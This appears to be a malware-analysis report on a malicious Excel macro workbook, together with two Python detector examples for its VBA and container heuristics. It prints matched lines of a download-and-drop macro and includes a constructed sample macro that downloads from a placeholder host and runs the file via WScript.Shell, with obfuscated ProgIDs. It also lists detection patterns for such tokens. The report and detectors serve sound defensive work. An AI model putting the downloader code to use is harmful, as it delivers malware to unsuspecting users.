Verdict: MALICIOUS
Risk score: 196
Heuristics matched: 10
VBA project inside OOXML (medium, OOXML_VBA, 5 related findings)
Document contains a VBA project — VBA macros present.
VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC)
VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop chain. The matched lines are the responseBody/SaveToFile method calls, not the ProgID strings, so the rule fires even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched lines in script (oStream.Type = 1 is adTypeBinary, so the body is written byte-for-byte; SaveToFile's second argument 2 is adSaveCreateOverWrite):
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile targetFileXLSX, 2 ' 1 = no overwrite, 2 = overwrite
CreateObject call (high, OLE_VBA_CREATEOBJ)
CreateObject call. Microsoft.XMLHTTP is the legacy MSXML HTTP ProgID; the False third argument to Open makes the request synchronous, so the response body is complete before the stream write in the finding above.
Matched lines in script:
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", URL, False
VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable: Office executes the compiled p-code directly when the document was saved by the same Office version, so a stripped or mismatched source stream does not stop the macro from running.
Workbook_Open macro (low, OLE_VBA_WBOPEN)
Workbook_Open macro.
Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    SplashScreen.Show
Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
Environ() call (env variable access).
Matched lines in script:
    targetFolder = VBA.Environ("TEMP") & "\" & RandomString(6) & "\"
    MkDir targetFolder
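The VBA heuristics above (OLE_VBA_HTTP_DROP_EXEC, OLE_VBA_CREATEOBJ, OLE_VBA_WBOPEN and OLE_VBA_ENVIRON) reduce to token classes over the macro source, with the twist that ProgIDs may be assembled at runtime. The Python below is an added example written for this page, not the scanner's code: it folds Chr()/ChrW() calls and "a" & "b" concatenations back into literals before matching, then combines the classes the way the report describes (HTTP body plus disk write, escalated when an auto-exec or execution path is present). The macro text, the severities and the OLE_VBA_AUTOEXEC label are constructed for the example.

```python
import re

# Constructed sample input (not from the analysed document): a macro that
# assembles the HTTP and stream ProgIDs from fragments and Chr() calls so a
# plain keyword grep never sees "Microsoft.XMLHTTP" or "ADODB.Stream".
SAMPLE_VBA = r'''
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Dim url As String, p As String
    url = "http" & "://" & "example.invalid/stage.xlsm"
    Set req = CreateObject("Micro" & "soft." & Chr(88) & "MLHTTP")
    req.Open "G" & Chr(69) & "T", url, False
    req.Send
    Set oStream = CreateObject("ADO" & "DB." & ChrW(83) & "tream")
    oStream.Type = 1
    oStream.Write req.responseBody
    p = VBA.Environ("TEMP") & "\" & "x.xlsm"
    oStream.SaveToFile p, 2
    CreateObject("WScr" & "ipt.Shell").Run p
End Sub
'''

_CHR = re.compile(r'\bChrW?\(\s*(\d+)\s*\)', re.IGNORECASE)
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def normalize(src: str) -> str:
    """Fold Chr()/ChrW() of printable ASCII into string literals, then merge
    adjacent "a" & "b" literals until nothing changes. The quote character
    (34) and non-printables are left alone so the text stays valid VBA."""
    def fold_chr(m):
        code = int(m.group(1))
        return '"%s"' % chr(code) if 32 <= code < 127 and code != 34 else m.group(0)
    out = _CHR.sub(fold_chr, src)
    while True:
        merged = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), out)
        if merged == out:
            return out
        out = merged


# Token classes, matched case-insensitively as VBA itself is. Rule names in
# scan_vba mirror the report's labels; the scoring is this example's own.
TOKENS = {
    "autoexec": r'\b(Workbook_Open|Auto_Open|Document_Open|AutoOpen|Workbook_Activate)\b',
    "createobject": r'\bCreateObject\s*\(',
    "http": r'\b(MSXML2\.XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest)\b|\.responseBody\b',
    "drop": r'\bADODB\.Stream\b|\.SaveToFile\b',
    "exec": r'\bWScript\.Shell\b|\bShellExecute\b|\bShell\s*[("]|\.Run\b',
    "environ": r'\bEnviron\s*\(',
}


def token_hits(src: str, deobfuscate: bool = True) -> dict:
    """Return {class: sorted list of distinct matched tokens}; with
    deobfuscate=False the raw source is scanned, as a keyword grep would."""
    text = normalize(src) if deobfuscate else src
    return {name: sorted({m.group(0) for m in re.finditer(pat, text, re.IGNORECASE)})
            for name, pat in TOKENS.items()}


def scan_vba(src: str, deobfuscate: bool = True) -> dict:
    """Map rule name -> severity for the heuristics that fire on this source."""
    hits = token_hits(src, deobfuscate)
    findings = {}
    if hits["createobject"]:
        findings["OLE_VBA_CREATEOBJ"] = "high"
    if hits["autoexec"]:
        findings["OLE_VBA_AUTOEXEC"] = "low"
    if hits["environ"]:
        findings["OLE_VBA_ENVIRON"] = "low"
    # Download-drop: an HTTP body is read and a stream is persisted to disk.
    # Escalate to critical when an auto-exec or execution path is also present.
    if hits["http"] and hits["drop"]:
        armed = bool(hits["autoexec"] or hits["exec"])
        findings["OLE_VBA_HTTP_DROP_EXEC"] = "critical" if armed else "high"
    return findings


if __name__ == "__main__":
    for name, toks in token_hits(SAMPLE_VBA).items():
        print(f"{name:13} {toks}")
    print(scan_vba(SAMPLE_VBA))
```

Running it on the sample shows the point the report makes: the download-drop rule fires with or without normalization because responseBody and SaveToFile are method names that cannot be split, while the ProgIDs Microsoft.XMLHTTP and ADODB.Stream only surface once the concatenations are folded.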
External hyperlinks (3) (low, OOXML_EXTERNAL_HYPERLINKS)
Document contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-link
Hidden worksheet (veryHidden) (low, OOXML_HIDDEN_SHEET)
Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction. A sheet with state="veryHidden" does not appear in Excel's Unhide dialog and can only be made visible through the object model or the VBA editor.
Large OOXML part skipped (info, SCAN_INCOMPLETE)
One or more high-value OOXML parts exceeded the scanner's per-entry size cap and may not have been fully inspected. Treat this as a coverage gap rather than a clean result: an oversized part is exactly where a payload can sit unscanned, so rescan with a larger cap or inspect those parts by hand.
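The container-level findings (OOXML_VBA, OOXML_EXTERNAL_HYPERLINKS, OOXML_HIDDEN_SHEET and SCAN_INCOMPLETE) all come from the zip and XML layer of the workbook, before any macro is parsed. The Python below is an added example, not the analyzer's code: it builds a constructed .xlsm in memory (placeholder vbaProject.bin, hidden and veryHidden sheets, two external hyperlink relationships and an optional oversized part) and runs those four checks over it. Rule names mirror the report; the size cap, the sample content and the severities are assumptions of the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_HYPERLINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
REL_IMAGE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"


def build_sample_xlsm(big_part_size: int = 0) -> bytes:
    """Constructed sample (not the analysed file): three sheets, one of them
    veryHidden, a placeholder vbaProject.bin, two external hyperlinks plus one
    internal image relationship, and optionally an oversized worksheet part."""
    workbook = f'''<?xml version="1.0" encoding="UTF-8"?>
<workbook xmlns="{NS_MAIN}"><sheets>
  <sheet name="Sheet1" sheetId="1"/>
  <sheet name="Loader" sheetId="2" state="hidden"/>
  <sheet name="Payload" sheetId="3" state="veryHidden"/>
</sheets></workbook>'''
    rels = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{NS_PKG}">
  <Relationship Id="rId1" Type="{REL_HYPERLINK}" Target="https://example.invalid/join?ref=1" TargetMode="External"/>
  <Relationship Id="rId2" Type="{REL_HYPERLINK}" Target="https://example.invalid/?ref=2" TargetMode="External"/>
  <Relationship Id="rId3" Type="{REL_IMAGE}" Target="../media/image1.png"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
        # Placeholder only: a real vbaProject.bin is a full OLE compound file.
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56)
        if big_part_size:
            z.writestr("xl/worksheets/sheet3.xml", b"<worksheet/>" + b" " * big_part_size)
    return buf.getvalue()


def scan_ooxml(data: bytes, size_cap: int = 1 << 20) -> list:
    """Return [(rule, severity, detail)] for the container-level heuristics.
    Rule names mirror the report; the logic is this example's own."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        infos = {i.filename: i for i in z.infolist()}
        # Report oversized parts explicitly: a silent skip would turn the
        # size cap into an evasion technique.
        skipped = [n for n, i in infos.items() if i.file_size > size_cap]
        if skipped:
            findings.append(("SCAN_INCOMPLETE", "info",
                             f"part(s) over {size_cap} bytes not inspected: {skipped}"))
        if any(n.endswith("vbaProject.bin") for n in infos):
            findings.append(("OOXML_VBA", "medium", "document contains a VBA project"))
        if "xl/workbook.xml" in infos and infos["xl/workbook.xml"].file_size <= size_cap:
            root = ET.fromstring(z.read("xl/workbook.xml"))
            # state="veryHidden" cannot be undone from the Excel UI, only via
            # the object model or the VBA editor.
            hidden = [(s.get("name"), s.get("state")) for s in root.iter(f"{{{NS_MAIN}}}sheet")
                      if s.get("state") in ("hidden", "veryHidden")]
            if hidden:
                detail = f"{len(hidden)} hidden sheet(s): " + ", ".join(f"{n} ({st})" for n, st in hidden)
                findings.append(("OOXML_HIDDEN_SHEET", "low", detail))
        links = []
        for name in sorted(infos):
            if name.endswith(".rels") and infos[name].file_size <= size_cap:
                for r in ET.fromstring(z.read(name)).iter(f"{{{NS_PKG}}}Relationship"):
                    if r.get("TargetMode") == "External" and r.get("Type") == REL_HYPERLINK:
                        links.append(r.get("Target"))
        if links:
            findings.append(("OOXML_EXTERNAL_HYPERLINKS", "low",
                             f"{len(links)} external hyperlink(s); first target: {links[0]}"))
    return findings


if __name__ == "__main__":
    for rule, sev, detail in scan_ooxml(build_sample_xlsm(big_part_size=4096), size_cap=1024):
        print(f"{rule:26} {sev:7} {detail}")
```

The size check reads ZipInfo.file_size from the central directory before any part is decompressed, so a deliberately inflated part costs nothing to detect and is reported instead of silently dropped. Only relationships of the hyperlink type with TargetMode="External" are counted, which keeps internal image and sheet relationships out of the link total.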
Embedded URL (info, EMBEDDED_URL)
One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    http://www.imagemagick.org (followed by unprintable bytes in the extracted stream) [referenced by macro]
    https://etoro.tw/2L4Kwq3 [referenced by macro]
    http://www.w3.org/2000/svg [referenced by macro]
    http://www.w3.org/1999/xlink [referenced by macro]
    http://schemas.microsoft.com/office/2006/01/customui [referenced by macro]
    https://en.wikipedia.org/wiki/File:ATP_World_Tour.png (followed by unprintable bytes in the extracted stream) [referenced by macro]
    https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-link [referenced by macro]
    https://www.binance.com/?ref=18552868 [referenced by macro]